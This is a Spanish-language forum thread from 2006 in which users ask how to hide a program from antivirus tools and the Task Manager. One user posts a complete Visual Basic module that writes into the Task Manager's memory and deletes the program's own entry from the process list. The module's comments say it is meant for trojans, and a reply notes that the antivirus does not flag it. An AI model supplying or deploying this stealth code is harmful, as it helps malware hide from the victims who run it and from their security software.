app.taskvisible

Iniciado por xDie, 16 Septiembre 2006, 00:17 AM

0 Miembros y 1 Visitante están viendo este tema.

xDie

Como puedo ocultar la aplicacion (no el proceso, este ya esta oculta gracias a otro metodo) sin que me detecte los antivirus
porque elo app.taskvisible lo detectan..?? gracias
Licence to kill!

WarGhost

¿Qué culpa tengo yo de tener la sangre roja y el corazón a la izquierda?

Mr.Chispa

si me podes postear el code para ocultar el proceso te lo agradeceria mucho    ;D. saludos

xDie

#3
Cita de: Mr.Chispa en 16 Septiembre 2006, 14:05 PM
si me podes postear el code para ocultar el proceso te lo agradeceria mucho    ;D. saludos
Lo pones en un Modulo


'pa utilizarlo solo llamar a la funcion:
'call Ocultarme
'Los hacedores de estó(aunque ya habia visto porai cosas practicamente iwales
'vaya, sin los nombres procesitos y demas)
'99% --> ZEALOT
'0%--> el mendas(V_D_Y@hotmail.com)
'1%-->margen de error
'bugs: hombre pues como vereis no se cierra correctamente por lo del sleep y el doevent
'pero como la idea es pa troyanos y demas, pues como que no nos importa(ami por lo menos)

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function EnumChildWindows Lib "user32" (ByVal hWndParent As Long, ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hWnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long


Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hWnd As Long, lpdwProcessId As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long

Private Const PROCESS_VM_OPERATION = &H8
Private Const PROCESS_VM_READ = &H10
Private Const PROCESS_VM_WRITE = &H20
Private Const PROCESS_ALL_ACCESS = 0
Private Const PAGE_READWRITE = &H4&

Private Const MEM_COMMIT = &H1000
Private Const MEM_RESERVE = &H2000
Private Const MEM_RELEASE = &H8000
Private Const MEM_TOP_DOWN = &H100000

Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long


Private Declare Function Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) As Long

Private Const LVM_FIRST = &H1000
Private Const LVM_GETTITEMCOUNT& = (LVM_FIRST + 4)

Private Const LVM_GETITEMW = (LVM_FIRST + 75)
Private Const LVIF_TEXT = &H1
Private Const LVM_DELETEITEM = 4104

Private Type LV_ITEM
    mask As Long
    iItem As Long
    iSubItem As Long
    state As Long
    stateMask As Long
    lpszText As Long 'LPCSTR
    cchTextMax As Long
    iImage As Long
    lParam As Long
    iIndent As Long
End Type

Private Type LV_TEXT
    sItemText As String * 80
End Type

Private Function Procesitos(ByVal hWnd2 As Long, lParam As String) As Boolean
Dim Nombre As String * 255, nombreClase As String * 255
Dim Nombre2 As String, nombreClase2 As String
Dim X As Long, Y As Long
X = GetWindowText(hWnd2, Nombre, 255)
Y = GetClassName(hWnd2, nombreClase, 255)

Nombre = Left(Nombre, X)
nombreClase = Left(nombreClase, Y)
Nombre2 = Trim(Nombre)
nombreClase2 = Trim(nombreClase)
If nombreClase2 = "SysListView32" And Nombre2 = "Procesos" Then
   JodeLosItems (hWnd2)
   Exit Function
End If
If Nombre2 = "" And nombreClase2 = "" Then
Procesitos = False
Else
Procesitos = True
End If
End Function

Private Function JodeLosItems(ByVal hListView As Long) ' As Variant
   Dim pid As Long, tid As Long
   Dim hProceso As Long, nElem As Long, lEscribiendo As Long, i As Long
   Dim DirMemComp As Long, dwTam As Long
   Dim DirMemComp2 As Long
   Dim sLVItems() As String
   Dim li As LV_ITEM
   Dim lt As LV_TEXT
   If hListView = 0 Then Exit Function
   tid = GetWindowThreadProcessId(hListView, pid)
   nElem = SendMessage(hListView, LVM_GETTITEMCOUNT, 0, 0&)
   If nElem = 0 Then Exit Function
   ReDim sLVItems(nElem - 1)
   li.cchTextMax = 80
   dwTam = Len(li)
      DirMemComp = DameMemComp(pid, dwTam, hProceso)
      DirMemComp2 = DameMemComp(pid, LenB(lt), hProceso)
      For i = 0 To nElem - 1
          li.lpszText = DirMemComp2
          li.cchTextMax = 80
          li.iItem = i
          li.mask = LVIF_TEXT
          WriteProcessMemory hProceso, ByVal DirMemComp, li, dwTam, lEscribiendo
          lt.sItemText = Space(80)
          WriteProcessMemory hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo
          Call SendMessage(hListView, LVM_GETITEMW, 0, ByVal DirMemComp)
          Call ReadProcessMemory(hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo)
          If TrimNull(StrConv(lt.sItemText, vbFromUnicode)) = App.EXEName & ".exe" Then '"firefox.exe" Then '<===========CAMBIAR
           Call SendMessage(hListView, LVM_DELETEITEM, i, 0)
           Exit Function
          End If
      Next i
      AdiosMemComp hProceso, DirMemComp, dwTam
      AdiosMemComp hProceso, DirMemComp2, LenB(lt)
End Function

Private Function DameMemComp(ByVal pid As Long, ByVal memTam As Long, hProceso As Long) As Long
    hProceso = OpenProcess(PROCESS_VM_OPERATION Or PROCESS_VM_READ Or PROCESS_VM_WRITE, False, pid)
    DameMemComp = VirtualAllocEx(ByVal hProceso, ByVal 0&, ByVal memTam, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
End Function

Private Sub AdiosMemComp(ByVal hProceso As Long, ByVal DirMem As Long, ByVal memTam As Long)
   Call VirtualFreeEx(hProceso, ByVal DirMem, memTam, MEM_RELEASE)
   CloseHandle hProceso
End Sub
Private Function TrimNull(jaja As String) As String
   Dim pos As Integer
   pos = InStr(jaja, Chr$(0))
   If pos Then
      TrimNull = Left$(jaja, pos - 1)
      Exit Function
   End If
   TrimNull = jaja
End Function

Public Sub Ocultarme()

Do While True
 
    Sleep 100
    hWnd1 = FindWindow(vbNullString, "Administrador de tareas de Windows")
    EnumChildWindows hWnd1, AddressOf Procesitos, 1
    DoEvents
Loop

End Sub


Lo llamas asi ejemplo : Call Ocultarme

Warghost, voy a bcihar eso a ver que tal gracias  :)
Licence to kill!

Mr.Chispa


dPix

Muy interesante :D, además el AV/FW por lo visto no pide autorización.